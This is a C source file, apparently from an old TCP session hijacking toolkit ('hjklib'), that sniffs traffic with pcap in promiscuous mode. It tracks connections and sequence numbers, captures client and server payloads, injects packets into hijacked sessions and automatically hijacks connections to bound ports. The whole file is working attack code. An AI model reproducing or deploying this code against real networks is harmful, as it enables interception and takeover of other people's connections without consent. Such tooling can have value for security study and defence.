#define HAVE_PTHREAD


#include <stdio.h>
#include <stdlib.h>
#ifdef HAVE_PTHREAD
#include <pthread.h>
#endif
#include <pcap.h>

#include <netinet/in.h>
#include <sys/socket.h>
#include "pkt_struct.h"
#include "hjklib.h"


extern pthread_mutex_t mutex;
extern pthread_cond_t cond;




struct arg{
   char *buf;
   int IFFHDR;
   int pktlen;
};



void *read_loop(void *iff);
void *get_it(void *arg);


void init_read_thread(char *iff);

void init_read_thread(char *iff){

   pthread_t read_th;
   printf("Starting hjklib v0.1beta\n");
   printf("Created by |CyRaX| <cyrax@pkcrew.org>. Check for hjksuite at www.pkcrew.org");
   printf("**WARNING THIS IS STILL NOT STABLE AND SECURE PROGRAM**\n");
   pthread_create(&read_th,NULL,(void *)&read_loop,iff);
}

void* read_loop(void *iff){
   struct pcap *pcap_s;
   struct pcap_pkthdr pcap_h;
   int IFFHDR;
   unsigned char ebuf[255],*buf;
   struct arg par;
   pthread_t pkt;
   
   //printf("opening %s\n",(char *)iff);
   if((pcap_s=pcap_open_live((char *)iff,8192,1,1000,ebuf))==NULL){
      printf("problem with pcap_open_live()\n");
      exit(0);
   }
   switch(pcap_datalink(pcap_s)){
    case DLT_NULL:
      IFFHDR=4;
      break;
    case DLT_EN3MB:
    case DLT_EN10MB:
      IFFHDR=14;
      break;
    case DLT_PPP:
      IFFHDR=4;
      break;
    case DLT_SLIP:
      IFFHDR=16;
      break;
    case DLT_FDDI:
      IFFHDR=21;
      break;
    case DLT_RAW:
      IFFHDR=0;
      break;
    default:
      printf("Dispositive unknow: we'll try with 14\n");
      IFFHDR=14;
   }
   while(1){
      buf=(u_char *)pcap_next(pcap_s, &pcap_h);
      if(buf!=NULL &&(pcap_h.len-IFFHDR)>=20){
	 par.buf=buf;
	 par.IFFHDR=IFFHDR;
	 par.pktlen=pcap_h.len;
	 get_it(&par);
      }
      else {
	 printf("packet discarded !?\n");
      }
   }
      
}

void *get_it(void *arg){
   struct arg *par;
   struct iphdr *pip;
   struct tcphdr *ptcp;
   char *pdata,*str,*str2,*what,buff[200];
   int datalen,iplen,tcplen,i,err;
   struct connection *record,toadd;
   
   memset(&toadd,0,sizeof(toadd));
   
   par=(struct arg *)(arg);
   pip=(struct iphdr *)(par->buf+par->IFFHDR);
   iplen=pip->ihl<<2;
   if(pip->protocol!=6){
      return(0);
   }
   ptcp=(struct tcphdr *)(par->buf+iplen+par->IFFHDR);
   tcplen=ptcp->doff<<2;
   pdata=(char *)(par->buf+iplen+tcplen+par->IFFHDR);
   datalen=ntohs(pip->tot_len)-iplen-tcplen;
   if(datalen>0)pdata[datalen]=0;
   record=(struct connection *)(search_connection(pip->saddr,
			   ntohs(ptcp->source),
			   pip->daddr,
			   ntohs(ptcp->dest)));
   if(record==NULL){
      /* SYN HANDLING ! */
      if(ptcp->syn==1 && ptcp->ack==0 && ptcp->rst==0 && ptcp->fin ==0){
	 /* let's add the konnection!! */
	 toadd.src.addr=pip->saddr;
	 toadd.src.port=ntohs(ptcp->source);
	 toadd.dst.addr=pip->daddr;
	 toadd.dst.port=ntohs(ptcp->dest);
	 addtodb(toadd);
	 record=(struct connection *)search_connection(pip->saddr,
						       ntohs(ptcp->source),
						       pip->daddr,
						       ntohs(ptcp->dest));
      }
      else {
	 /* we try to recognize who is the client and who is the server */
	 if(((ntohs(ptcp->source)>1024) && (ntohs(ptcp->dest)<1024))
	    || ((ntohs(ptcp->dest)>5555)&&(ntohs(ptcp->dest)<7000))){
	    toadd.src.addr=pip->saddr;
	    toadd.src.port=ntohs(ptcp->source);
	    toadd.dst.addr=pip->daddr;
	    toadd.dst.port=ntohs(ptcp->dest);
	    addtodb(toadd);
	    record=(struct connection *)search_connection(pip->saddr,
							  ntohs(ptcp->source),
							  pip->daddr,
							  ntohs(ptcp->dest));
	 }
	 else return;
      }
   }
   
   /*    RST/ACK HANDLING ! */
   if(ptcp->syn==0 && ptcp->ack==1 && ptcp->rst==1 && ptcp->fin ==0){
      /* we check if this rst packet has the korrekt seq number */
      if(ntohl(ptcp->ack_seq)==record->src.seq){
	 if(!(record->hijacked)){
	    delfromdb(get_index(record));
	 }
	 return(0);
      }
   }
   /*    FIN HANDLING ! */
   if(ptcp->syn==0 && ptcp->rst==0 && ptcp->fin==1){
      
      if(!(record->hijacked)){
	 delfromdb(get_index(record));
      }
      else{
	 if((ptcp->ack) && (ptcp->window!=htons(666))&& record->send_fin==1){
	    //printf("FINISHING THE 3way fin!\n");
	    send_tcp(record,0,0,1,0,0,NULL,0,1);
	    send_tcp(record,1,0,1,0,0,NULL,0,1);
	 }
      }
   }
 /* if the connections is hijacked.. we'll do by ourself */
   /* upgrading various seq number */

   if((record->src.addr==pip->saddr)){
      record->src.seq=(unsigned long)(ntohl(ptcp->seq)+datalen);
      if(ptcp->ack)
	record->src.exp_seq=(unsigned long)(ntohl(ptcp->ack_seq)-1);
      if(record->hijacked==1){
	 if(((ptcp->psh) || (datalen >0)) && (ntohs(ptcp->window)!=666)){
	    send_tcp(record,0,0,1,0,0,NULL,0,1);
	    /* DATA FROM THE CLIENT HANDLING */
	    if(record->serv_hijack==0){
	       //printf("-FROM CLIENT (%i)-\n%s\n---\n",ntohs(ptcp->window),pdata);
	       record->h_buf.buf_ptr=(char *)realloc(record->h_buf.buf_ptr,
						     record->h_buf.len
						     +datalen);
	       memcpy(record->h_buf.buf_ptr+record->h_buf.len,pdata,datalen);
	       record->h_buf.len+=datalen;
	    }
	    //else printf("ignored data from the client!\n");
	 }
      }
      else {
	 record->dst.seq=record->src.exp_seq;
	 record->dst.exp_seq=record->src.seq;
      }
   }
   if((record->dst.addr==pip->saddr)){
      record->dst.seq=(unsigned long)(ntohl(ptcp->seq)+datalen);
      if(ptcp->ack)
	record->dst.exp_seq=(unsigned long)(ntohl(ptcp->ack_seq)-1);
      if(record->hijacked==1){
	 if(((ptcp->psh) || (datalen>0)) && (ntohs(ptcp->window)!=666)){
	    /* DATA FROM THE SERVER */
	    if(record->no_ack_server==0)
	      send_tcp(record,1,0,1,0,0,NULL,0,1);
	    if(record->serv_hijack){
	       //printf("-FROM SERVER(%i)-\n%s\n---\n",ntohs(ptcp->window),pdata);
	       record->h_buf.buf_ptr=(char *)realloc(record->h_buf.buf_ptr,
						     record->h_buf.len
						     +datalen);
	       memcpy(record->h_buf.buf_ptr+record->h_buf.len,pdata,datalen);
	       record->h_buf.len+=datalen;
	    }
	    //else printf("ignored data from the server!\n");
	 }
      }
      else {
	 record->src.seq=record->dst.exp_seq;
	 record->src.exp_seq=record->dst.seq;
      }	 
   }
      
   /* AUTO HIJACKING OF BINDED PORTS */
   if((ptcp->syn==1) && (ptcp->ack==1)){
      check_bind(record);
   }   
}
